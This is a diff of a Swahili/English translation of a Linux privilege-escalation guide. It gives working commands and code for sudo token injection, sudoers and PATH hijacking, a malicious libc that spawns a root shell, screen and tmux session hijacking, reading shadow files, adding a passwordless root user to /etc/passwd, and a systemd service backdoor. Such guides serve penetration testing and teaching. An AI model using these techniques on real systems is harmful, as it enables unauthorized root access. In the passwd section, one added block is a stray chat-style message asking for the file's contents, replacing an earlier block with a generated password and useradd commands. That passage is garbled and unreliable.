-- **exploit ya tatu** (`exploit_v3.sh`) itaunda **sudoers file** ambayo inafanya **sudo tokens kuwa za milele na kuruhusu watumiaji wote kutumia sudo**
+- **exploit ya tatu** (`exploit_v3.sh`) **itaunda faili ya sudoers** ambayo inafanya **sudo tokens** kuwa ya milele na kuwawezesha watumiaji wote kutumia **sudo**
 ```bash
 bash exploit_v3.sh
 sudo su
 ```
 ### /var/run/sudo/ts/\<Username>
 
-Ikiwa una **write permissions** katika kabrasha au kwenye yoyote ya faili zilizotengenezwa ndani ya kabrasha unaweza kutumia binary [**write_sudo_token**](https://github.com/nongiach/sudo_inject/tree/master/extra_tools) ili **kuunda sudo token kwa user na PID**.\
-Kwa mfano, ikiwa unaweza kuandika upya faili _/var/run/sudo/ts/sampleuser_ na una shell kama user huyo mwenye PID 1234, unaweza **obtain sudo privileges** bila kuhitaji kujua password kwa kufanya:
+Kama una **ruhusa za kuandika** kwenye folda au kwenye yoyote ya faili zilizotengenezwa ndani ya folda unaweza kutumia binary [**write_sudo_token**](https://github.com/nongiach/sudo_inject/tree/master/extra_tools) ku**unda token ya sudo kwa mtumiaji na PID**.\
+Kwa mfano, ikiwa unaweza kuandika juu ya faili _/var/run/sudo/ts/sampleuser_ na una shell kama mtumiaji huyo mwenye PID 1234, unaweza **kupata ruhusa za sudo** bila ya kuhitaji kujua password kwa kufanya:
 ```bash
 ./write_sudo_token 1234 > /var/run/sudo/ts/sampleuser
 ```
 ### /etc/sudoers, /etc/sudoers.d
 
-Faili `/etc/sudoers` na faili zilizo ndani ya `/etc/sudoers.d` zinaamua nani anaweza kutumia `sudo` na jinsi. Faili hizi **kwa chaguo-msingi zinaweza kusomwa tu na mtumiaji root na kikundi root**.\
-**Ikiwa** unaweza **kusoma** faili hii unaweza kuwa na uwezo wa **kupata taarifa za kuvutia**, na ikiwa unaweza **kuandika** faili yoyote utaweza **kupandisha ruhusa**.
+The file `/etc/sudoers` and the files inside `/etc/sudoers.d` configure who can use `sudo` and how. These files **kwa chaguo-msingi zinaweza kusomwa tu na mtumiaji root na kundi root**.\
+**Ikiwa** unaweza **kusoma** faili hii unaweza kuwa na uwezo wa **kupata taarifa za kuvutia**, na ikiwa unaweza **kuandika** faili yoyote utaweza **escalate privileges**.
 ```bash
 ls -l /etc/sudoers /etc/sudoers.d/
 ls -ld /etc/sudoers.d/
@@ -1060,15 +1060,15 @@ echo "Defaults timestamp_timeout=-1" >> /etc/sudoers.d/win
 ```
 ### DOAS
 
-Kuna baadhi ya mbadala kwa binary ya `sudo` kama `doas` kwa OpenBSD, kumbuka kuangalia usanidi wake kwenye `/etc/doas.conf`
+Kuna baadhi ya mbadala kwa binary ya `sudo` kama `doas` kwa OpenBSD, kumbuka kuangalia usanidi wake katika `/etc/doas.conf`
 ```
 permit nopass demo as root cmd vim
 ```
 ### Sudo Hijacking
 
-Ikiwa unajua kwamba mtumiaji kwa kawaida huungana kwenye mashine na hutumia `sudo` kuongeza ruhusa na umepata shell ndani ya muktadha wa mtumiaji huyo, unaweza **kuunda executable mpya ya sudo** itakayotekeleza msimbo wako kama root kisha amri ya mtumiaji. Kisha, **badilisha $PATH** ya muktadha wa mtumiaji (kwa mfano kwa kuongeza path mpya katika .bash_profile) ili wakati mtumiaji anapotekeleza sudo, executable yako ya sudo itatekelezwa.
+Ikiwa unajua kwamba **mtumiaji kawaida huunganishwa kwenye mashine na hutumia `sudo`** ili kuongeza ruhusa na umepata shell ndani ya muktadha wa mtumiaji huyo, unaweza **kutengeneza executable mpya ya sudo** ambayo itatekeleza msimbo wako kama root kisha amri ya mtumiaji. Kisha, **badilisha $PATH** ya muktadha wa mtumiaji (kwa mfano kwa kuingiza njia mpya katika .bash_profile) ili anapotekeleza sudo, executable yako ya sudo itatekelezwa.
 
-Kumbuka kwamba ikiwa mtumiaji anatumia shell tofauti (si bash) utahitaji kubadilisha faili nyingine ili kuongeza path mpya. Kwa mfano [sudo-piggyback](https://github.com/APTy/sudo-piggyback) inabadilisha `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`. Unaweza kupata mfano mwingine katika [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire_modules/bashdoor.py)
+Kumbuka kwamba ikiwa mtumiaji anatumia shell tofauti (si bash) utahitaji kubadilisha faili nyingine ili kuongeza njia mpya. Kwa mfano[ sudo-piggyback](https://github.com/APTy/sudo-piggyback) inabadilisha `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`. Unaweza kupata mfano mwingine katika [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire_modules/bashdoor.py)
 
 Au kuendesha kitu kama:
 ```bash
@@ -1089,12 +1089,13 @@ sudo ls
 
 ### ld.so
 
-Faili `/etc/ld.so.conf` inaonyesha **mahali mafaili ya usanidi yaliyosomwa yanapotoka**. Kawaida, faili hii ina njia ifuatayo: `include /etc/ld.so.conf.d/*.conf`
+The file `/etc/ld.so.conf` indicates **kutoka wapi faili za usanidi zilizosomwa**. Typically, this file contains the following path: `include /etc/ld.so.conf.d/*.conf`
 
-Hii ina maana kwamba mafaili ya usanidi kutoka `/etc/ld.so.conf.d/*.conf` yatasomwa. Mafaili haya ya usanidi **yanaelekeza kwenye folda nyingine** ambapo **libraries** **zitatafutwa**. Kwa mfano, maudhui ya `/etc/ld.so.conf.d/libc.conf` ni `/usr/local/lib`. **Hii inamaanisha kwamba mfumo utatafuta libraries ndani ya `/usr/local/lib`**.
+That means that the configuration files from `/etc/ld.so.conf.d/*.conf` will be read. This configuration files **zinaonyesha folda nyingine** ambapo **maktaba** zitakuwa **zikitafutwa**. For example, the content of `/etc/ld.so.conf.d/libc.conf` is `/usr/local/lib`. **Hii ina maana kwamba mfumo utatafuta maktaba ndani ya `/usr/local/lib`**.
+
+If for some reason **mtumiaji ana ruhusa za kuandika** on any of the paths indicated: `/etc/ld.so.conf`, `/etc/ld.so.conf.d/`, any file inside `/etc/ld.so.conf.d/` or any folder within the config file inside `/etc/ld.so.conf.d/*.conf` he may be able to escalate privileges.\
+Tazama **jinsi ya kufaidi usanidi huu usio sahihi** kwenye ukurasa ufuatao:
 
-Ikiwa kwa sababu fulani **mtumiaji ana ruhusa ya kuandika** kwenye mojawapo ya njia zilizoonyeshwa: `/etc/ld.so.conf`, `/etc/ld.so.conf.d/`, faili yoyote ndani ya `/etc/ld.so.conf.d/` au folder yoyote ndani ya faili za usanidi ndani ya `/etc/ld.so.conf.d/*.conf` anaweza kuwa na uwezo wa escalate privileges.\
-Angalia **how to exploit this misconfiguration** katika ukurasa ufuatao:
 
 {{#ref}}
 ld.so.conf-example.md
@@ -1111,7 +1112,7 @@ linux-gate.so.1 =>  (0x0068c000)
 libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000)
 /lib/ld-linux.so.2 (0x005bb000)
 ```
-Kwa kunakili lib kwenye `/var/tmp/flag15/`, itatumika na programu mahali hapa kama ilivyoainishwa katika kigezo cha `RPATH`.
+Kwa kunakili lib ndani ya `/var/tmp/flag15/` itatumika na programu mahali hapa kama ilivyoainishwa katika thamani ya `RPATH`.
 ```
 level15@nebula:/home/flag15$ cp /lib/i386-linux-gnu/libc.so.6 /var/tmp/flag15/
 
@@ -1120,7 +1121,7 @@ linux-gate.so.1 =>  (0x005b0000)
 libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000)
 /lib/ld-linux.so.2 (0x00737000)
 ```
-Kisha tengeneza maktaba mbaya katika `/var/tmp` kwa kutumia `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6`
+Kisha tengeneza maktaba ya uovu katika `/var/tmp` kwa kutumia `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6`
 ```c
 #include<stdlib.h>
 #define SHELL "/bin/sh"
@@ -1133,44 +1134,43 @@ setresuid(geteuid(),geteuid(), geteuid());
 execve(file,argv,0);
 }
 ```
-## Capabilities
-
-Linux capabilities hutoa a **subset of the available root privileges to a process**. Hii inavunja kwa ufanisi root **privileges into smaller and distinctive units**. Kila kimoja cha vitengo hivi kinaweza kisha kupewa processes kwa njia ya kujitegemea. Kwa hivyo seti kamili ya ruhusa inapunguzwa, kupunguza hatari za exploitation.\
-Read the following page to **learn more about capabilities and how to abuse them**:
+## Uwezo
 
+Linux capabilities hutoa **sehemu ndogo ya idhini za root kwa mchakato**. Hii kwa ufanisi inavunja idhini za root kuwa **vitengo vidogo na vitofauti**. Kila kimoja cha vitengo hivi kinaweza kisha kupewa mchakato kwa kujitegemea. Kwa njia hii seti kamili ya idhini inapunguzwa, ikipunguza hatari za kutumiwa vibaya.\
+Soma ukurasa ufuatao ili **kujifunza zaidi kuhusu uwezo na jinsi ya kuzitumia vibaya**:
 
 {{#ref}}
 linux-capabilities.md
 {{#endref}}
 
-## Directory permissions
+## Ruhusa za saraka
 
-Katika saraka, the **bit for "execute"** ina maana kuwa mtumiaji aliyeguswa anaweza "**cd**" ndani ya folda.\
-The **"read"** bit inaonyesha mtumiaji anaweza **list** the **files**, na the **"write"** bit inaonyesha mtumiaji anaweza **delete** na **create** faili mpya.
+Katika saraka, **bit for "execute"** inaashiria kuwa mtumiaji aliyeathiriwa anaweza "**cd**" kuingia ndani ya saraka.\
+Kipengee cha **"read"** kinaashiria kuwa mtumiaji anaweza kuorodhesha **faili**, na kipengee cha **"write"** kinaashiria mtumiaji anaweza **kufuta** na **kuunda** **faili** mpya.
 
 ## ACLs
 
-Access Control Lists (ACLs) zinawakilisha tabaka la pili la ruhusa za hiari, zikiweza **overriding the traditional ugo/rwx permissions**. Ruhusa hizi zinaboresha udhibiti wa ufikaji wa faili au saraka kwa kuruhusu au kukataa haki kwa watumiaji maalum ambao si wamiliki au sehemu ya kikundi. Kiwango hiki cha **granularity ensures more precise access management**. Maelezo zaidi yanaweza kupatikana [**here**](https://linuxconfig.org/how-to-manage-acls-on-linux).
+Access Control Lists (ACLs) zinawakilisha safu ya pili ya ruhusa za hiari, zenye uwezo wa **kupitisha ruhusa za jadi za ugo/rwx**. Ruhusa hizi zinaboresha udhibiti wa upatikanaji wa faili au directory kwa kuruhusu au kukataa haki kwa watumiaji maalum ambao si wamiliki au sehemu ya kikundi. Kiwango hiki cha **undani kinahakikisha usimamizi sahihi zaidi wa upatikanaji**. Maelezo zaidi yanaweza kupatikana [**here**](https://linuxconfig.org/how-to-manage-acls-on-linux).
 
-**Give** user "kali" read and write permissions over a file:
+**Mpa** mtumiaji "kali" read na write ruhusa juu ya faili:
 ```bash
 setfacl -m u:kali:rw file.txt
 #Set it in /etc/sudoers or /etc/sudoers.d/README (if the dir is included)
 
 setfacl -b file.txt #Remove the ACL of the file
 ```
-**Pata** faili zenye ACL maalum kwenye mfumo:
+**Pata** faili zilizo na ACLs maalum kutoka kwenye mfumo:
 ```bash
 getfacl -t -s -R -p /bin /etc /home /opt /root /sbin /usr /tmp 2>/dev/null
 ```
 ## Fungua shell sessions
 
-Katika **toleo za zamani** unaweza **hijack** baadhi ya **shell** session za mtumiaji mwingine (**root**).\
-Katika **toleo jipya zaidi** utaweza tu **connect** kwenye screen sessions za **mtumiaji wako mwenyewe**. Hata hivyo, unaweza kupata **taarifa za kuvutia ndani ya session**.
+Katika **matoleo ya zamani** unaweza **hijack** baadhi ya **shell** session za mtumiaji tofauti (**root**).\
+Katika **matoleo ya hivi karibuni** utaweza **kuungana** na screen sessions za **mtumiaji wako mwenyewe** tu. Hata hivyo, unaweza kupata **taarifa za kuvutia ndani ya session**.
 
 ### screen sessions hijacking
 
-**Orodha ya screen sessions**
+**Orodhesha screen sessions**
 ```bash
 screen -ls
 screen -ls <username>/ # Show another user' screen sessions
@@ -1183,11 +1183,11 @@ screen -dr <session> #The -d is to detach whoever is attached to it
 screen -dr 3350.foo #In the example of the image
 screen -x [user]/[session id]
 ```
-## tmux sessions hijacking
+## Kupora vikao vya tmux
 
-Hili lilikuwa tatizo kwa **old tmux versions**. Sikuweza hijack tmux (v2.1) session iliyoundwa na root kama mtumiaji asiye na ruhusa.
+Hii ilikuwa tatizo kwa **matoleo ya zamani ya tmux**. Sikuweza kuiba kikao cha tmux (v2.1) kilichoundwa na root nikiwa mtumiaji asiye na ruhusa.
 
-**Orodhesha tmux sessions**
+**Orodhesha vikao vya tmux**
 ```bash
 tmux ls
 ps aux | grep tmux #Search for tmux consoles not using default folder for sockets
@@ -1195,7 +1195,7 @@ tmux -S /tmp/dev_sess ls #List using that socket, you can start a tmux session i
 ```
 ![](<../../images/image (837).png>)
 
-**Unganisha kwenye session**
+**Ambatisha kwenye session**
 ```bash
 tmux attach -t myname #If you write something in this session it will appears in the other opened one
 tmux attach -d -t myname #First detach the session from the other console and then access it yourself
@@ -1212,72 +1212,72 @@ Angalia **Valentine box from HTB** kwa mfano.
 ### Debian OpenSSL Predictable PRNG - CVE-2008-0166
 
 All SSL and SSH keys generated on Debian based systems (Ubuntu, Kubuntu, etc) between September 2006 and May 13th, 2008 may be affected by this bug.\
-Hitilafu hii inatokea wakati wa kuunda ssh key mpya katika OS hizo, kwa kuwa **zilikuwa na utofauti wa 32,768 tu**. Hii inamaanisha kuwa uwezekano wote unaweza kuhesabiwa na **ikiwa una ssh public key unaweza kutafuta private key inayolingana**. Unaweza kupata uwezekano uliokadiriwa hapa: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh)
+Hitilafu hii hutokea wakati wa kuunda ssh key mpya katika OS hizo, kwa sababu **tu 32,768 variations zilitumika**. Hii ina maana kwamba uwezekano wote unaweza kuhesabiwa na **ukiwa na ssh public key unaweza kutafuta private key inayolingana**. Unaweza kupata uwezekano uliohesabiwa hapa: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh)
 
 ### SSH Interesting configuration values
 
-- **PasswordAuthentication:** Inaonyesha ikiwa uthibitishaji kwa password unaruhusiwa. Chaguo-msingi ni `no`.
-- **PubkeyAuthentication:** Inaonyesha ikiwa public key authentication inaruhusiwa. Chaguo-msingi ni `yes`.
-- **PermitEmptyPasswords**: Wakati password authentication inaporuhusiwa, inaonyesha kama server inaruhusu kuingia kwenye akaunti zenye nywila tupu. Chaguo-msingi ni `no`.
+- **PasswordAuthentication:** Inaeleza kama password authentication inaruhusiwa. Chaguo-msingi ni `no`.
+- **PubkeyAuthentication:** Inaeleza kama public key authentication inaruhusiwa. Chaguo-msingi ni `yes`.
+- **PermitEmptyPasswords**: Wakati password authentication inaruhusiwa, inaeleza kama server inaruhusu kuingia kwenye akaunti zenye password tupu. Chaguo-msingi ni `no`.
 
 ### PermitRootLogin
 
-Inaonyesha ikiwa root anaweza kuingia kwa kutumia ssh, chaguo-msingi ni `no`. Thamani zinazowezekana:
+Inaeleza kama root anaweza kuingia kwa kutumia ssh, chaguo-msingi ni `no`. Thamani zinazowezekana:
 
 - `yes`: root anaweza kuingia kwa kutumia password na private key
-- `without-password` or `prohibit-password`: root anaweza kuingia kwa private key tu
-- `forced-commands-only`: root anaweza kuingia kwa private key tu na ikiwa chaguo la commands limetajwa
+- `without-password` or `prohibit-password`: root anaweza kuingia tu kwa private key
+- `forced-commands-only`: Root anaweza kuingia tu kwa private key na ikiwa options za commands zimeelezwa
 - `no` : hapana
 
 ### AuthorizedKeysFile
 
-Inaonyesha faili zinazobeba public keys ambazo zinaweza kutumika kwa uthibitishaji wa mtumiaji. Inaweza kuwa na tokens kama `%h`, ambazo zitatengenezwa na home directory. **Unaweza taja absolute paths** (zinazoanza na `/`) au **relative paths kutoka kwenye home ya mtumiaji**. Kwa mfano:
+Inaeleza faili zinazobeba public keys ambazo zinaweza kutumika kwa user authentication. Inaweza kuwa na tokens kama `%h`, ambazo zitabadilishwa na home directory. **Unaweza kuonyesha absolute paths** (zinazoanza na `/`) au **relative paths kutoka home ya mtumiaji**. Kwa mfano:
 ```bash
 AuthorizedKeysFile    .ssh/authorized_keys access
 ```
-Usanidi huo utaonyesha kwamba ikiwa utajaribu kuingia kwa kutumia ufunguo wa **private** wa mtumiaji "**testusername**", ssh italinganisha **public key** ya ufunguo wako na zile zilizoko katika `/home/testusername/.ssh/authorized_keys` na `/home/testusername/access`
+Mipangilio hiyo itaonyesha kwamba ikiwa utajaribu kuingia kwa kutumia funguo ya **private** ya mtumiaji "**testusername**", ssh italinganisha public key ya funguo yako na zile zilizopo katika `/home/testusername/.ssh/authorized_keys` na `/home/testusername/access`
 
 ### ForwardAgent/AllowAgentForwarding
 
-SSH agent forwarding inakuwezesha **use your local SSH keys instead of leaving keys** (bila passphrases!) zikaa kwenye server yako. Hivyo, utaweza **jump** kupitia ssh **to a host** na kutoka hapo **jump to another** host **using** the **key** located in your **initial host**.
+SSH agent forwarding inakuruhusu **use your local SSH keys instead of leaving keys** (without passphrases!) kukaa kwenye server yako. Hivyo, utaweza **jump** kupitia ssh **to a host** na kutoka hapo **jump to another** host **using** the **key** iliyoko kwenye **initial host** yako.
 
 Unahitaji kuweka chaguo hili katika `$HOME/.ssh.config` kama ifuatavyo:
 ```
 Host example.com
 ForwardAgent yes
 ```
-Tambua kwamba ikiwa `Host` ni `*`, kila mara mtumiaji anapohama kwa mashine tofauti, host huyo ataweza kufikia keys (ambayo ni suala la usalama).
+Kumbuka kwamba ikiwa `Host` ni `*`, kila wakati mtumiaji anaporuka kwenda kwenye mashine tofauti, host hiyo itaweza kufikia vifunguo (ambayo ni tatizo la usalama).
 
-The file `/etc/ssh_config` can **kupindua** chaguo hizi na kuruhusu au kukataa usanidi huu.\
-The file `/etc/sshd_config` can **kuruhusu** au **kukataa** ssh-agent forwarding with the keyword `AllowAgentForwarding` (default ni allow).
+Faili `/etc/ssh_config` inaweza **kubatilisha** chaguzi hizi na kuruhusu au kukataa usanidi huu.\
+Faili `/etc/sshd_config` inaweza **kuruhusu** au **kukataa** ssh-agent forwarding kwa neno muhimu `AllowAgentForwarding` (chaguo-msingi ni kuruhusu).
 
-Ikiwa unagundua kuwa Forward Agent imewekwa katika mazingira, soma ukurasa ufuatao kwani **you may be able to abuse it to escalate privileges**:
+Ikiwa utagundua kuwa Forward Agent imewekwa kwenye mazingira, soma ukurasa ufuatao kwa kuwa **huenda ukaweza kuibitumia vibaya ili kupandisha ruhusa**:
 
 
 {{#ref}}
 ssh-forward-agent-exploitation.md
 {{#endref}}
 
-## Faili Zilizovutia
+## Faili za Kuvutia
 
-### Faili za Profile
+### Faili za profile
 
-The file `/etc/profile` and the files under `/etc/profile.d/` are **scripts ambazo zinaendeshwa wakati mtumiaji anapoanzisha shell mpya**. Kwa hiyo, ikiwa unaweza **kuandika au kubadilisha yoyote yao unaweza escalate privileges**.
+Faili `/etc/profile` na faili zilizo chini ya `/etc/profile.d/` ni **skripti zinazotekelezwa wakati mtumiaji anapoendesha shell mpya**. Kwa hiyo, ikiwa unaweza **kuandika au kubadilisha yoyote kati yao unaweza kupandisha ruhusa**.
 ```bash
 ls -l /etc/profile /etc/profile.d/
 ```
-Kama script yoyote ya wasifu isiyo ya kawaida inapopatikana, unapaswa kuiangalia kwa **maelezo nyeti**.
+Ikiwa skripti ya profaili isiyokuwa ya kawaida inapopatikana, unapaswa kuikagua kwa ajili ya **maelezo nyeti**.
 
-### Faili za Passwd/Shadow
+### Passwd/Shadow Files
 
-Kulingana na OS, `/etc/passwd` na `/etc/shadow` zinaweza kuwa zikiitwa kwa jina tofauti au kunaweza kuwa na nakala ya kuhifadhi. Kwa hivyo inashauriwa **kutafuta zote** na **kuangalia ikiwa unaweza kuzisoma** ili kuona **ikiwa kuna hashes** ndani ya faili:
+Kulingana na OS faili za `/etc/passwd` na `/etc/shadow` zinaweza kuwa zikitumia jina tofauti au kunaweza kuwa na nakala ya chelezo. Kwa hivyo inashauriwa **kutafuta zote** na **kuangalia kama unaweza kusoma** ili kuona **ikiwa kuna hashes** ndani ya faili:
 ```bash
 #Passwd equivalent files
 cat /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null
 #Shadow equivalent files
 cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db /etc/security/opasswd 2>/dev/null
 ```
-Katika baadhi ya matukio unaweza kupata **password hashes** ndani ya faili ya `/etc/passwd` (au sawa).
+Katika baadhi ya matukio unaweza kupata **password hashes** ndani ya faili ya `/etc/passwd` (au faili sawa)
 ```bash
 grep -v '^[^:]*:[x\*]' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null
 ```
@@ -1289,48 +1289,45 @@ openssl passwd -1 -salt hacker hacker
 mkpasswd -m SHA-512 hacker
 python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")'
 ```
-Generated password: qH7$9vRkP2mX!z8B
+Ninaomba ufafanuzi/kopi ya yaliyomo ya src/linux-hardening/privilege-escalation/README.md (markdown) ili niweze kutafsiri na kuongezea mstari unaoonyesha kuongeza user `hacker` na nywila iliyotengenezwa.  
+Unataka nipate nywila salama moja na kuiweka wazi ndani ya faili (plain text), au ungependelea tu kuonyesha amri za kuunda user na kuweka password bila kuandika nywila wazi?  
 
-Commands to add the user and set the password:
-sudo useradd -m -s /bin/bash hacker
-echo 'hacker:qH7$9vRkP2mX!z8B' | sudo chpasswd
-sudo passwd -e hacker    # force password change on first login (optional)
-sudo usermod -aG sudo hacker    # give sudo (optional)
+Tuma yaliyomo ya README.md hapa, na thibitisha chaguo la password.
 ```
 hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash
 ```
 Kwa mfano: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash`
 
-Sasa unaweza kutumia amri ya `su` kwa kutumia `hacker:hacker`
+Sasa unaweza kutumia amri ya `su` ukitumia `hacker:hacker`
 
-Kwa njia mbadala, unaweza kutumia mistari ifuatayo kuongeza mtumiaji wa bandia bila nywila.\
-ONYO: unaweza kudhoofisha usalama wa sasa wa mashine.
+Mbali na hayo, unaweza kutumia mistari ifuatayo kuongeza mtumiaji wa kuigiza bila nenosiri.\
+ONYO: unaweza kupunguza usalama wa sasa wa mashine.
 ```
 echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
 su - dummy
 ```
-Kumbuka: Katika majukwaa ya BSD `/etc/passwd` iko katika `/etc/pwd.db` na `/etc/master.passwd`, pia `/etc/shadow` imepitwa jina kuwa `/etc/spwd.db`.
+Kumbuka: Katika majukwaa ya BSD `/etc/passwd` iko katika `/etc/pwd.db` na `/etc/master.passwd`, pia `/etc/shadow` imebadilishwa jina kuwa `/etc/spwd.db`.
 
-Unapaswa kuangalia kama unaweza **kuandika katika baadhi ya faili nyeti**. Kwa mfano, je, unaweza kuandika kwenye baadhi ya **faili za usanidi za huduma**?
+Unapaswa kuangalia ikiwa unaweza **kuandika kwenye baadhi ya faili nyeti**. Kwa mfano, je, unaweza kuandika kwenye baadhi ya **faili ya usanidi ya huduma**?
 ```bash
 find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' 2>/dev/null | grep -v '/proc/' | grep -v $HOME | sort | uniq #Find files owned by the user or writable by anybody
 for g in `groups`; do find \( -type f -or -type d \) -group $g -perm -g=w 2>/dev/null | grep -v '/proc/' | grep -v $HOME; done #Find files writable by any group of the user
 ```
-Kwa mfano, ikiwa mashine inaendesha seva ya **tomcat** na unaweza **modify the Tomcat service configuration file inside /etc/systemd/,** basi unaweza kubadilisha mistari zifuatazo:
+Kwa mfano, ikiwa mashine inaendesha server ya **tomcat** na unaweza **modify the Tomcat service configuration file inside /etc/systemd/,** basi unaweza kubadilisha mistari:
 ```
 ExecStart=/path/to/backdoor
 User=root
 Group=root
 ```
-Backdoor yako itatekelezwa mara tomcat itakapozinduliwa tena.
+Backdoor yako itaendeshwa mara ijayo tomcat itakapowashwa.
 
-### Angalia Folda
+### Kagua Folda
 
-Folda zifuatazo zinaweza kuwa na backups au taarifa za kuvutia: **/tmp**, **/var/tmp**, **/var/backups, /var/mail, /var/spool/mail, /etc/exports, /root** (Huenda hauwezi kusoma ile ya mwisho lakini jaribu)
+Folda zifuatazo zinaweza kuwa na backups au taarifa za kuvutia: **/tmp**, **/var/tmp**, **/var/backups, /var/mail, /var/spool/mail, /etc/exports, /root** (Huenda huwezi kusoma ile ya mwisho, lakini jaribu)
 ```bash
 ls -a /tmp /var/tmp /var/backups /var/mail/ /var/spool/mail/ /root
 ```
-### Eneo la Ajabu/Owned mafaili
+### Nafasi Isiyo ya Kawaida/Mafaili ya Owned
 ```bash
 #root owned files in /home folders
 find /home -user root 2>/dev/null
@@ -1347,11 +1344,11 @@ find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -pat
 done
 done
 ```
-### Faili zilizobadilishwa katika dakika za hivi karibuni
+### Faili zilizobadilishwa katika dakika zilizopita
 ```bash
 find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" 2>/dev/null
 ```
-### Faili za Sqlite DB
+### Sqlite DB mafaili
 ```bash
 find / -name '*.db' -o -name '*.sqlite' -o -name '*.sqlite3' 2>/dev/null
 ```
@@ -1359,7 +1356,7 @@ find / -name '*.db' -o -name '*.sqlite' -o -name '*.sqlite3' 2>/dev/null
 ```bash
 find / -type f \( -name "*_history" -o -name ".sudo_as_admin_successful" -o -name ".profile" -o -name "*bashrc" -o -name "httpd.conf" -o -name "*.plan" -o -name ".htpasswd" -o -name ".git-credentials" -o -name "*.rhosts" -o -name "hosts.equiv" -o -name "Dockerfile" -o -name "docker-compose.yml" \) 2>/dev/null
 ```
-### Faili fiche
+### Mafaili yaliyofichwa
 ```bash
 find / -type f -iname ".*" -ls 2>/dev/null
 ```
@@ -1368,7 +1365,7 @@ find / -type f -iname ".*" -ls 2>/dev/null
 for d in `echo $PATH | tr ":" "\n"`; do find $d -name "*.sh" 2>/dev/null; done
 for d in `echo $PATH | tr ":" "\n"`; do find $d -type f -executable 2>/dev/null; done
 ```
-### **Faili za wavuti**
+### **Mafaili ya wavuti**
 ```bash
 ls -alhR /var/www/ 2>/dev/null
 ls -alhR /srv/www/htdocs/ 2>/dev/null
@@ -1379,22 +1376,22 @@ ls -alhR /opt/lampp/htdocs/ 2>/dev/null
 ```bash
 find /var /etc /bin /sbin /home /usr/local/bin /usr/local/sbin /usr/bin /usr/games /usr/sbin /root /tmp -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bck" -o -name "*\.bk" \) 2>/dev/null
 ```
-### Mafaili yanayojulikana yanayoweza kuwa na passwords
+### Faili zilizojulikana zenye nywila
 
-Soma msimbo wa [**linPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS), inatafuta **mafayela kadhaa yanayoweza kuwa na passwords**.\
-**Chombo kingine kinachovutia** ambacho unaweza kutumia kufanya hivyo ni: [**LaZagne**](https://github.com/AlessandroZ/LaZagne) ambacho ni programu ya chanzo wazi inayotumika kupata passwords nyingi zilizohifadhiwa kwenye kompyuta ya ndani kwa Windows, Linux & Mac.
+Soma msimbo wa [**linPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS), inatafuta **faili kadhaa zinazowezekana ambazo zinaweza kuwa na nywila**.\
+**Zana nyingine ya kuvutia** ambayo unaweza kutumia kufanya hivyo ni: [**LaZagne**](https://github.com/AlessandroZ/LaZagne) ambayo ni programu ya open source inayotumika kupata nywila nyingi zilizohifadhiwa kwenye kompyuta ya ndani kwa Windows, Linux & Mac.
 
 ### Logs
 
-Ikiwa unaweza kusoma logs, unaweza kupata **taarifa za kuvutia/za siri ndani yao**. Kadri log inavyokuwa isiyo ya kawaida, ndivyo itakavyo kuwa ya kuvutia zaidi (labda).\
-Pia, baadhi ya **bad** zilizopangwa vibaya (backdoored?) **audit logs** zinaweza kukuwezesha **kurekodi passwords** ndani ya audit logs kama ilivyoelezwa katika chapisho hiki: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/](https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/).
+Ikiwa unaweza kusoma logs, unaweza kupata **taarifa za kuvutia/za siri ndani yake**. Kadri log inavyoonekana ya ajabu, ndivyo itakavyokuwa ya kuvutia zaidi (pengine).\
+Pia, baadhi ya "**bad**" configured (backdoored?) **audit logs** zinaweza kukuwezesha **kurekodi nywila** ndani ya audit logs kama inavyoelezwa katika chapisho hili: [https://www.redsiege.com/blog/2019/05/logging-passwords-on-linux/].
 ```bash
 aureport --tty | grep -E "su |sudo " | sed -E "s,su|sudo,${C}[1;31m&${C}[0m,g"
 grep -RE 'comm="su"|comm="sudo"' /var/log* 2>/dev/null
 ```
-Ili **kusoma logs kikundi** [**adm**](interesting-groups-linux-pe/index.html#adm-group) kitakuwa cha msaada sana.
+Ili kusoma logs, kikundi [**adm**](interesting-groups-linux-pe/index.html#adm-group) kitakuwa msaada mkubwa.
 
-### Mafaili ya Shell
+### Faili za Shell
 ```bash
 ~/.bash_profile # if it exists, read it once when you log in to the shell
 ~/.bash_login # if it exists, read it once if .bash_profile doesn't exist
@@ -1407,41 +1404,41 @@ Ili **kusoma logs kikundi** [**adm**](interesting-groups-linux-pe/index.html#adm
 ```
 ### Generic Creds Search/Regex
 
-Unapaswa pia kuangalia faili zenye neno "**password**" katika **jina** lake au ndani ya **yaliyomo**, na pia angalia IPs na emails ndani ya logs, au hashes regexps.\  
-Sitaelezea hapa jinsi ya kufanya yote haya, lakini ikiwa unavutiwa unaweza kuangalia ukaguzi wa mwisho unaofanywa na [**linpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh).
